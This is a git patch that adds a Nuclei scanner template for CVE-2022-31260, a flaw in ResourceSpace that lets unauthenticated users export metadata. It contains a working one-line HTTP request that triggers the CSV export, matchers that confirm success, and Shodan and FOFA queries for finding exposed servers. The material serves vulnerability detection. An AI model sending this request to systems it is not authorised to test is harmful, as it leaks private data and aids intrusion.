From c221d3cf313b0a8931a32c1ee77a0c627995a89d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 6 Nov 2024 23:23:15 +0530 Subject: [PATCH] Create CVE-2022-31260.yaml --- http/cves/2022/CVE-2022-31260.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2022/CVE-2022-31260.yaml diff --git a/http/cves/2022/CVE-2022-31260.yaml b/http/cves/2022/CVE-2022-31260.yaml new file mode 100644 index 0000000000..c87c11c58f --- /dev/null +++ b/http/cves/2022/CVE-2022-31260.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-31260 + +info: + name: ResourceSpace - Metadata Export + author: ritikchaddha + severity: medium + description: | + In Montala ResourceSpace through 9.8 before r19636, csv_export_results_metadata.php allows attackers to export collection metadata via a non-NULL k value. + impact: | + Successful exploitation could lead to unauthorized access to sensitive metadata. + remediation: | + Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2022-31260. + reference: + - https://github.com/grymer/CVE/blob/master/CVE-2022-31260.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-31260 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2022-31260 + cwe-id: CWE-306 + epss-score: 0.00087 + epss-percentile: 0.35924 + cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: montala + product: resourcespace + shodan-query: title:"ResourceSpace" + fofa-query: title="ResourceSpace" + tags: cve,cve2022,resourcespace,misconfig + +http: + - raw: + - | + GET /pages/csv_export_results_metadata.php?k=zulu&personaldata=0&allavailable=true&submit=1 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_any(body, "CSV-Export -", "pagename=\"csv_export_results_metadata")' + - 'status_code == 200' + condition: and